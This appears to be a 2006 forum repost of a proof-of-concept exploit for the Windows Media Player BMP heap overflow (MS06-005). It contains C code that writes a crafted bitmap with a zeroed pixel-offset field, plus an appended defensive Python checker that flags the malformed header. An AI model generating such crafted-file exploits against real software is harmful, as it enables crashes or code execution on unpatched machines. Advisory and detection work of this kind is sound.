





Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)
Article collection

〾堯仸〾 posted on 2006/2/16 16:18:58

Reposted from: http://www.frsirt.com/exploits/20060215.wmp-ms06-005.cpp.php

Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)
Date : 15/02/2006
Advisory ID : FrSIRT/ADV-2006-0574
Rated as : Critical
Note : Proof of concept

/*
 *
 * Windows Media Player BMP Heap Overflow (MS06-005)
 * Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
 * Exploit coded by ATmaCA
 * Web: http://www.spyinstructors.com && http://www.atmacasoft.com
 * E-Mail: atmaca@icqmail.com
 * Credit to Kozan
 *
 * wmp_remote_poc.asx :
 *
 *
 *
 */

/*
 *
 * Systems Affected:
 * Microsoft Windows Media Player 7.1 through 10
 *
 * Windows NT 4.0
 * Windows 98 / ME
 * Windows 2000 SP4
 * Windows XP SP1 / SP2
 * Windows 2003
 *
 */

/*
 *
 * In this vulnerability, payload is loaded to different places in memory each time.
 * but some time is very easy to call our shell code :
 * http://www.spyinstructors.com/atmaca/research/wmp.JPG
 * but some times not =) because of, no shell this time
 *
 */

/*
 *
 * Microsoft has released a patch for this vulnerability.
 * The patch is available at:
 * http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>   /* WORD, DWORD, LONG */

#define BITMAP_FILE_SIZE 0xA8D2
#define BITMAP_FILE_NAME "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html

// File information header provides general information about the file
typedef struct _BitmapFileHeader {
    WORD  bfType;
    DWORD bfSize;
    WORD  bfReserved1;
    WORD  bfReserved2;
    DWORD bfOffBits;
} BMPFHEADER;

// Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader {
    DWORD biSize;
    LONG  biWidth;
    LONG  biHeight;
    WORD  biPlanes;
    WORD  biBitCount;
    DWORD biCompression;
    DWORD biSizeImage;
    LONG  biXPelsPerMeter;
    LONG  biYPelsPerMeter;
    DWORD biClrUsed;
    DWORD biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
    FILE *File;
    BMPFHEADER *bmp_fheader;
    BMPIHEADER *bmp_iheader;
    char *pszBuffer;

    printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
    printf("\nBug discovered by eEye");
    printf("\nExploit coded by ATmaCA");
    printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
    printf("\nE-Mail: atmaca@icqmail.com");
    printf("\nCredit to Kozan");

    if ( (File = fopen(BITMAP_FILE_NAME, "w+b")) == NULL ) {
        printf("\n [E:] fopen()");
        exit(1);
    }

    bmp_fheader = (BMPFHEADER*)malloc(sizeof(BMPFHEADER));
    bmp_iheader = (BMPIHEADER*)malloc(sizeof(BMPIHEADER));
    pszBuffer   = (char*)malloc(BITMAP_FILE_SIZE);

    // whole file is filler bytes except for the two headers written below
    memset(pszBuffer, 0x41, BITMAP_FILE_SIZE);

    bmp_fheader->bfType      = 0x4D42;   // "BM"
    bmp_fheader->bfSize      = BITMAP_FILE_SIZE;
    bmp_fheader->bfReserved1 = 0x00;
    bmp_fheader->bfReserved2 = 0x00;
    // eEye - MAGIC
    // Antiviruses will get the signature from here!!!
    bmp_fheader->bfOffBits   = 0x00;     //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

    bmp_iheader->biSize          = 0x28;
    bmp_iheader->biWidth         = 0x91;
    bmp_iheader->biHeight        = 0x63;
    bmp_iheader->biPlanes        = 0x01;
    bmp_iheader->biBitCount      = 0x18;
    bmp_iheader->biCompression   = 0x00;
    bmp_iheader->biSizeImage     = 0xA89C;
    bmp_iheader->biXPelsPerMeter = 0x00;
    bmp_iheader->biYPelsPerMeter = 0x00;
    bmp_iheader->biClrUsed       = 0x00;
    bmp_iheader->biClrImportant  = 0x00;

    memcpy(pszBuffer, bmp_fheader, sizeof(BMPFHEADER));
    memcpy(pszBuffer + sizeof(BMPFHEADER), bmp_iheader, sizeof(BMPIHEADER));

    fwrite(pszBuffer, BITMAP_FILE_SIZE - 1, 1, File);
    fwrite("\x00", 1, 1, File);   // Terminator
    fclose(File);

    printf("\n\n" BITMAP_FILE_NAME " has been created in the current directory.\n");

    return 1;
}
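As an added, defender-side example that is not part of the original post or of the PoC above: a small Python checker that parses the same two BMP headers and reports the field the crafted file leaves inconsistent (bfOffBits = 0, which cannot point past a 14-byte file header plus a 40-byte info header), together with the other cross-checks a parser should make before trusting biSizeImage. The two sample files are constructed inside the script; the first reuses the header values from the PoC, the second is a consistent 1x2 24-bit image.

```python
import struct

# Layouts of the two headers the PoC writes (little-endian, packed, 14 + 40 bytes).
FILE_HEADER = "<2sIHHI"       # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HEADER = "<IiiHHIIiiII"  # biSize, biWidth, biHeight, biPlanes, biBitCount,
                              # biCompression, biSizeImage, X/YPelsPerMeter, ClrUsed, ClrImportant
HEADERS_LEN = struct.calcsize(FILE_HEADER) + struct.calcsize(INFO_HEADER)  # 54


def build_bmp(bf_size, bf_off_bits, width, height, bpp, size_image):
    """Constructed sample: headers packed from the given fields, then filler bytes up to bf_size."""
    hdr = struct.pack(FILE_HEADER, b"BM", bf_size, 0, 0, bf_off_bits)
    hdr += struct.pack(INFO_HEADER, 40, width, height, 1, bpp, 0, size_image, 0, 0, 0, 0)
    return hdr + b"\x41" * (bf_size - len(hdr))


def check_bmp(data):
    """Return the list of header inconsistencies found; an empty list means the headers agree."""
    findings = []
    if len(data) < HEADERS_LEN:
        return ["shorter than the 54-byte file+info header pair"]
    bf_type, bf_size, _, _, bf_off = struct.unpack_from(FILE_HEADER, data, 0)
    _, width, height, _, bpp, comp, size_image, *_ = struct.unpack_from(INFO_HEADER, data, 14)
    if bf_type != b"BM":
        findings.append("bfType is not 'BM'")
    if bf_size != len(data):
        findings.append(f"bfSize {bf_size:#x} != actual length {len(data):#x}")
    # The pixel array can never start inside the headers; the PoC sets this field to 0.
    if bf_off < HEADERS_LEN or bf_off >= len(data):
        findings.append(f"bfOffBits {bf_off:#x} does not point past the headers")
    # For uncompressed images, derive the pixel-array size from the geometry
    # (rows padded to 4 bytes) instead of trusting biSizeImage.
    if comp == 0 and bpp in (1, 4, 8, 16, 24, 32):
        stride = ((abs(width) * bpp + 31) // 32) * 4
        expected = stride * abs(height)
        if size_image not in (0, expected):
            findings.append(f"biSizeImage {size_image:#x} != geometry-derived {expected:#x}")
        if bf_off >= HEADERS_LEN and bf_off + expected > len(data):
            findings.append("pixel array would run past end of file")
    return findings


# Constructed samples: PoC header values (note bfOffBits = 0) and a consistent 1x2 image.
CRAFTED = build_bmp(0xA8D2, 0x00, 0x91, 0x63, 0x18, 0xA89C)
CLEAN = build_bmp(HEADERS_LEN + 8, HEADERS_LEN, 1, 2, 24, 8)

if __name__ == "__main__":
    for name, sample in (("crafted", CRAFTED), ("clean", CLEAN)):
        print(name, check_bmp(sample) or "ok")
```

Note that biSizeImage (0xA89C) and bfSize (0xA8D2) in the crafted file are exactly what a 145x99 24-bit image needs, so only the zero bfOffBits distinguishes it from a well-formed file.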


 


